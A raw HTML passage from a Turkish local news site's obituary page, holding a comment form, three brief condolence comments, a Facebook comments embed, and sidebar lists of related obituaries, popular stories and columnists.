                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">Adınız</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a href="javascript:void(0)" onclick="javascript:comment_send(70331);return false;" class="btn hs-sdch btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="70331" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="7da160a9dfde64677fd3d2db5ec12602101cbaa8" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div>
                <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;">
                    <button type="button" class="close" data-dismiss="alert">×</button>
                    <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, müstehcen, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir.                </div>
            

                        <div id="comment_list">
                  
                        <div class="comment_box row-fluid" id="comment_351199">
                            <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div>
                            <div class="span11">
                              <b>DERVİŞ DOĞAN</b>                               <small class="time">1 gün önce</small>
                              <p class="text">ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</p>

                              <div class="buttons">
                                <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@DERVİŞ DOĞAN" id="351199"><span class="glyphicons unshare"></span> Cevapla</a></div>

                                <a href="javascript:void(0)" class="like pull-left like351199" onclick="like(351199,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike351199">0</abbr>)</a>
                                <a href="javascript:void(0)" class="dislike pull-left dislike351199" onclick="like(351199,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike351199">0</abbr>)</a>
                              </div>

                            </div>
                        </div>



                        <!-- //Yoruma ait cevaplanan yorumları listeleyelim -->
                                                <!-- Yoruma ait cevaplanan yorumları listeleyelim// -->




                    
                        <div class="comment_box row-fluid" id="comment_351219">
                            <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div>
                            <div class="span11">
                              <b>Kahraman yay</b>                               <small class="time">23 saat önce</small>
                              <p class="text">Allah rahmet eylesin.</p>

                              <div class="buttons">
                                <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Kahraman yay" id="351219"><span class="glyphicons unshare"></span> Cevapla</a></div>

                                <a href="javascript:void(0)" class="like pull-left like351219" onclick="like(351219,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike351219">0</abbr>)</a>
                                <a href="javascript:void(0)" class="dislike pull-left dislike351219" onclick="like(351219,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike351219">0</abbr>)</a>
                              </div>

                            </div>
                        </div>



                        <!-- //Yoruma ait cevaplanan yorumları listeleyelim -->
                                                <!-- Yoruma ait cevaplanan yorumları listeleyelim// -->




                    
                        <div class="comment_box row-fluid" id="comment_351220">
                            <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div>
                            <div class="span11">
                              <b>Bahittin Saykın ALMANYA</b>                               <small class="time">23 saat önce</small>
                              <p class="text">Merhumeye Allah’tan rahmet; yakınlarına başsağlığı dilerim. Mekânı cennet olsun.</p>

                              <div class="buttons">
                                <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Bahittin Saykın ALMANYA" id="351220"><span class="glyphicons unshare"></span> Cevapla</a></div>

                                <a href="javascript:void(0)" class="like pull-left like351220" onclick="like(351220,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike351220">0</abbr>)</a>
                                <a href="javascript:void(0)" class="dislike pull-left dislike351220" onclick="like(351220,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike351220">0</abbr>)</a>
                              </div>

                            </div>
                        </div>



                        <!-- //Yoruma ait cevaplanan yorumları listeleyelim -->
                                                <!-- Yoruma ait cevaplanan yorumları listeleyelim// -->




                                                </div> <!-- #comment_list -->
            
            
            </div> <!-- .tab-pane -->

                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-nazile-unsal-h70331.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->
    </section>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-polat-94-yasinda-h70342.html"  title="Ahmet Polat 94 Yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/ahmet_polat_94_yasinda_h70342_ae689.jpg" alt="Ahmet Polat 94 Yaşında" />
        <span>Ahmet Polat 94 Yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/emir-yildiz-85-yasinda-h70341.html"  title="Emir Yıldız 85 yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/emir_yildiz_85_yasinda_h70341_150fa.jpg" alt="Emir Yıldız 85 yaşında" />
        <span>Emir Yıldız 85 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/anma-hayri-corcu-2-h70330.html"  title="Anma / Hayri Corcu">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/anma_hayri_corcu_h70330_24b20.jpg" alt="Anma / Hayri Corcu" />
        <span>Anma / Hayri Corcu</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/seref-tas-40-yasinda-h70328.html"  title="Şeref Taş 40 yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/seref_tas_40_yasinda_h70328_9e48b.jpg" alt="Şeref Taş 40 yaşında" />
        <span>Şeref Taş 40 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/mehmet-yildiz-72-yasinda-h70327.html"  title="Mehmet Yıldız 72 yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/mehmet_yildiz_72_yasinda_h70327_5a2e1.jpg" alt="Mehmet Yıldız 72 yaşında" />
        <span>Mehmet Yıldız 72 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/nazife-yandim-h70318.html"  title="Nazife Yandım">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/nazife_yandim_h70318_38285.jpg" alt="Nazife Yandım" />
        <span>Nazife Yandım</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/pasa-tas-79-yasinda-h70317.html"  title="Paşa Taş  79 yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/pasa_tas_79_yasinda_h70317_eb266.jpg" alt="Paşa Taş  79 yaşında" />
        <span>Paşa Taş  79 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/vefatlar/adil-kaya-51-yasinda-h70316.html"  title="Adil Kaya 51 yaşında">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/adil_kaya_51_yasinda_h70316_4a5f7.jpg" alt="Adil Kaya 51 yaşında" />
        <span>Adil Kaya 51 yaşında</span>
      </a>
    </div>
      </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes">41.4B</a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/kurbanlik-fiyatlari-belli-oldu-2-h70280.html" title="Kurbanlık fiyatları belli oldu" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/kurbanlik_fiyatlari_belli_oldu_h70280_92977.jpg" alt="Kurbanlık fiyatları belli oldu" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kurbanlik-fiyatlari-belli-oldu-2-h70280.html" title="" ><span class="en-hit">1.</span> <strong>Kurbanlık fiyatları belli oldu</strong> <span class="en-spot en-hidden">Elbistan, Göksun, Afşin, Ekinözü ve Nurhak Kırmızı Et Üreticileri...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kazada-agir-yaralanan-surucu-hayata-tutunamadi-h70247.html" title="Kazada ağır yaralanan sürücü hayata..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/kazada_agir_yaralanan_surucu_hayata_tutunamadi_h70247_34184.jpg" alt="Kazada ağır yaralanan sürücü hayata..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kazada-agir-yaralanan-surucu-hayata-tutunamadi-h70247.html" title="" ><span class="en-hit">2.</span> <strong>Kazada ağır yaralanan sürücü hayata...</strong> <span class="en-spot en-hidden">Elbistan’da otomobille cipin çarpışması sonucu yaşanan trafik kazasında...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/ilk-yavrularini-dogurmalari-beklenen-yaban-koyunlari-goruntulendi-h70176.html" title="İlk yavrularını doğurmaları beklenen..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/ilk_yavrularini_dogurmalari_beklenen_yaban_koyunlari_goruntulendi_h70176_d438c.jpg" alt="İlk yavrularını doğurmaları beklenen..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/ilk-yavrularini-dogurmalari-beklenen-yaban-koyunlari-goruntulendi-h70176.html" title="" ><span class="en-hit">3.</span> <strong>İlk yavrularını doğurmaları beklenen...</strong> <span class="en-spot en-hidden">Doğa Koruma ve Milli Parklar Genel Müdürlüğü’nün projesi çerçevesinde...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ozturk-37-yasinda-h70253.html" title="Hatice Öztürk  37 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/hatice_ozturk_37_yasinda_h70253_f3537.jpg" alt="Hatice Öztürk  37 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ozturk-37-yasinda-h70253.html" title="" ><span class="en-hit">4.</span> <strong>Hatice Öztürk  37 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kayip-genc-kiz-1-ay-sonra-bulundu-h70123.html" title="Kayıp genç kız 1 ay sonra bulundu" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/kayip_genc_kiz_1_ay_sonra_bulundu_h70123_5987d.jpg" alt="Kayıp genç kız 1 ay sonra bulundu" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kayip-genc-kiz-1-ay-sonra-bulundu-h70123.html" title="" ><span class="en-hit">5.</span> <strong>Kayıp genç kız 1 ay sonra bulundu</strong> <span class="en-spot en-hidden">Kahramanmaraş’taki evinden çıktıktan sonra bir daha kendisinden...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-dogan-74-yasinda-h70243.html" title="Ahmet Doğan 74 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/ahmet_dogan_74_yasinda_h70243_47cd2.jpg" alt="Ahmet Doğan 74 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-dogan-74-yasinda-h70243.html" title="" ><span class="en-hit">1.</span> <strong>Ahmet Doğan 74 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ozturk-37-yasinda-h70253.html" title="Hatice Öztürk  37 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/hatice_ozturk_37_yasinda_h70253_f3537.jpg" alt="Hatice Öztürk  37 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-ozturk-37-yasinda-h70253.html" title="" ><span class="en-hit">2.</span> <strong>Hatice Öztürk  37 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html" title="Müseyip Dal 82 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/museyip_dal_82_yasinda_h70046_e181d.jpg" alt="Müseyip Dal 82 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html" title="" ><span class="en-hit">3.</span> <strong>Müseyip Dal 82 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/cevdet-yavuz-55-yasinda-h70293.html" title="Cevdet Yavuz 55 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/06/cevdet_yavuz_55_yasinda_h70293_affa0.jpg" alt="Cevdet Yavuz 55 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/cevdet-yavuz-55-yasinda-h70293.html" title="" ><span class="en-hit">4.</span> <strong>Cevdet Yavuz 55 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-akdas-85-yasinda-h70101.html" title="Hatice Akdaş 85 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/05/hatice_akdas_85_yasinda_h70101_61682.jpg" alt="Hatice Akdaş 85 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-akdas-85-yasinda-h70101.html" title="" ><span class="en-hit">5.</span> <strong>Hatice Akdaş 85 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-3-makale,6225.html" title="-TECRÜBE İLE SABİT-3-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-3-makale,6225.html" title="-TECRÜBE İLE SABİT-3-" >-TECRÜBE İLE SABİT-3-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/nefret-psikolojisi-makale,6224.html" title="NEFRET PSİKOLOJİSİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="http://www.elbistaninsesi.com/nefret-psikolojisi-makale,6224.html" title="NEFRET PSİKOLOJİSİ" >NEFRET PSİKOLOJİSİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/uzersin-makale,6223.html" title="ÜZERSİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="http://www.elbistaninsesi.com/uzersin-makale,6223.html" title="ÜZERSİN" >ÜZERSİN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/anam-makale,6222.html" title="ANAM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="http://www.elbistaninsesi.com/anam-makale,6222.html" title="ANAM" >ANAM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/son-cerciler-makale,6221.html" title="SON ÇERÇİLER" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nermin-yılmaz-akbalaban.jpg" alt="Nermin Yılmaz Akbalaban">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/96/nermin-yilmaz-akbalaban" title="Nermin Yılmaz Akbalaban">Nermin Yılmaz Akbalaban</a></h4>
              <a href="http://www.elbistaninsesi.com/son-cerciler-makale,6221.html" title="SON ÇERÇİLER" >SON ÇERÇİLER</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kuresel-sistemin-somuru-duzeni-makale,6220.html" title="KÜRESEL SİSTEMİN SÖMÜRÜ DÜZENİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmetcavaY.jpg" alt="Prof.Dr. Mehmet ÇAVAŞ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/39/profdr-mehmet-cavas" title="Prof.Dr. Mehmet ÇAVAŞ">Prof.Dr. Mehmet ÇAVAŞ</a></h4>
              <a href="http://www.elbistaninsesi.com/kuresel-sistemin-somuru-duzeni-makale,6220.html" title="KÜRESEL SİSTEMİN SÖMÜRÜ DÜZENİ" >KÜRESEL SİSTEMİN SÖMÜRÜ DÜZENİ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/nerede-kalmistik-makale,6219.html" title="Nerede kalmıştık?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="http://www.elbistaninsesi.com/nerede-kalmistik-makale,6219.html" title="Nerede kalmıştık?" >Nerede kalmıştık?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/solan-tebessum-makale,6216.html" title="SOLAN TEBESSÜM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/d985fcce-69b5-47bf-99fe-3c82dc92b125.jpg" alt="Akif DUT">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/91/akif-dut" title="Akif DUT">Akif DUT</a></h4>
              <a href="http://www.elbistaninsesi.com/solan-tebessum-makale,6216.html" title="SOLAN TEBESSÜM" >SOLAN TEBESSÜM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-makale,6213.html" title="Prof.Dr.Fuat Sezgin’in Ardından" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-makale,6213.html" title="Prof.Dr.Fuat Sezgin’in Ardından" >Prof.Dr.Fuat Sezgin’in Ardından</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bilimsel-tip-ve-bizimsel-tip-makale,6212.html" title="BİLİMSEL TIP ve BİZİMSEL TIP" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/dr_kaya.jpg" alt="Dr. Öğretim Üyesi / Mustafa Emrah Kaya">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/87/dr-ogretim-uyesi-mustafa-emrah-kaya" title="Dr. Öğretim Üyesi / Mustafa Emrah Kaya">Dr. Öğretim Üyesi / Mustafa Emrah Kaya</a></h4>
              <a href="http://www.elbistaninsesi.com/bilimsel-tip-ve-bizimsel-tip-makale,6212.html" title="BİLİMSEL TIP ve BİZİMSEL TIP" >BİLİMSEL TIP ve BİZİMSEL TIP</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/arzularin-egemenligi-makale,6206.html" title="ARZULARIN EGEMENLİĞİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="http://www.elbistaninsesi.com/arzularin-egemenligi-makale,6206.html" title="ARZULARIN EGEMENLİĞİ" >ARZULARIN EGEMENLİĞİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/blok-zinciri-ve-kapitaller-makale,6205.html" title="BLOK ZİNCİRİ VE KAPİTALLER" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="http://www.elbistaninsesi.com/blok-zinciri-ve-kapitaller-makale,6205.html" title="BLOK ZİNCİRİ VE KAPİTALLER" >BLOK ZİNCİRİ VE KAPİTALLER</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bozkirin-esmer-cocugu-makale,6201.html" title="Boz­kı­rın Esmer Ço­cu­ğu" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/IMG_20210216_033715.jpg" alt="Metehan Çağrı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/92/metehan-cagri" title="Metehan Çağrı">Metehan Çağrı</a></h4>
              <a href="http://www.elbistaninsesi.com/bozkirin-esmer-cocugu-makale,6201.html" title="Boz­kı­rın Esmer Ço­cu­ğu" >Boz­kı­rın Esmer Ço­cu­ğu</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/ol-san-zen-makale,6198.html" title="Ol San zen" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
